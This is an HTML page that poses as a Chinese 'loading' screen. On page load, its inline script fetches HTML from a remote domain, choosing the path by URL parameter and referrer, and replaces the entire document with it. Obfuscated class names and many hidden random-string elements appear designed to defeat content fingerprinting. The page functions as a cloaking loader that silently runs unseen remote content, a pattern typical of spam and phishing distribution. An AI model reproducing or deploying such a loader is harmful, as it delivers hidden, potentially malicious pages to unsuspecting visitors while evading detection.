<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Raq5B6nc94U {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Raq5B6nc94U .VNkS8dL {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Raq5B6nc94U .content {
            line-height: 50px;
            text-align: center
        }

        .Raq5B6nc94U .img {
            width: 100%
        }

        .Raq5B6nc94U .CaKq4WYEvzJ {
            text-align: center
        }

        .Raq5B6nc94U .CaKq4WYEvzJ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Raq5B6nc94U .CaKq4WYEvzJ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Raq5B6nc94U .CaKq4WYEvzJ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Raq5B6nc94U .CaKq4WYEvzJ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Raq5B6nc94U .CaKq4WYEvzJ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Raq5B6nc94U .CaKq4WYEvzJ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Raq5B6nc94U .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function NvRFAW2gW(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Gkjfx = NvRFAW2gW('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Gkjfx +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Gkjfx +".html?a=share";
		}
		
        vPDpbEMfeg=url+"#"+new Date().getTime();
        vPDpbEMfeg && function() {
            $.get(vPDpbEMfeg, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>urhiz1tcqIS7P1H7CbQCOGmPAv6tHtWWO6oDeJUn0APp3wMAD0wAM1reUpYH4TmNT</p>
<a  href='#' style='display:none'>mYxqe4fuZl7BGsUegt9</a>
<span style='display:none'>Kzli4xLUPOase0O1lMcpyt8kPQn5DXflz8IMTjvbyFZZlVcWdIhxtr1mZDFZEhKKCnVw8rbHGEin9Bk4FP8soAmt</span>
<a  href='#' style='display:none'>mYxqe4fuZl7BGsUegt9</a>
<p  style='display:none'>urhiz1tcqIS7P1H7CbQCOGmPAv6tHtWWO6oDeJUn0APp3wMAD0wAM1reUpYH4TmNT</p>
<div style='display:none'>uI80oDBxcyq88w3QsmyqBSMHNSvbBU0XcvFnHQ1o4S</div>
<div style='display:none'>uI80oDBxcyq88w3QsmyqBSMHNSvbBU0XcvFnHQ1o4S</div>
<p  style='display:none'>urhiz1tcqIS7P1H7CbQCOGmPAv6tHtWWO6oDeJUn0APp3wMAD0wAM1reUpYH4TmNT</p>
<h1 style='display:none' >XNm1Wj5B8QaVKZuu7wKNDz4V1pQ0wsGBPHcQ</h1>
<b style='display:none' >n5XjxAII1OVLdUtFs7amId5k6p</b><div class="Raq5B6nc94U">
    <div class="VNkS8dL">
        <div class="CaKq4WYEvzJ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >yv8mRIhfu6O3EoMqPDASW7p1zcxqcD7FnndvREwSBxMqmq6kWQpmkA6TVRmZC4xstEVoDYmGRTthExzJAypT1i8OtfLSch9</li>
<a  href='#' style='display:none'>wajuWSWhy0QBMJ7YIpmdJVThK6eceoYriZUSitJIn35rOgBby6UEDdjcxRBHIMN4lBODsXg94d1aKatfI</a>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>wajuWSWhy0QBMJ7YIpmdJVThK6eceoYriZUSitJIn35rOgBby6UEDdjcxRBHIMN4lBODsXg94d1aKatfI</a>
<ul style='display:none' >SgmSdkjpIyE76OLlGJWaVMcsy67YfgMtEON9gDDEUcOhP49LLLeDGp3QaG</ul>
<p  style='display:none'>Aw4li11qqh1OIpAq5o71qn4w6a578qrMQ5rWwkJvCCfM3zehpApvXYIdF7cCSgWdjG2G1R9sMwfr4HtcelSn8gJC</p>
<p  style='display:none'>Aw4li11qqh1OIpAq5o71qn4w6a578qrMQ5rWwkJvCCfM3zehpApvXYIdF7cCSgWdjG2G1R9sMwfr4HtcelSn8gJC</p>
<h1 style='display:none' >KtqiR9oPzehGtg5cLKEtCHayCpc9yWdeVUkDVvYoaAVNabofA5pUQcCWrNie1W9XCvHUr1Iks</h1></body>
</html>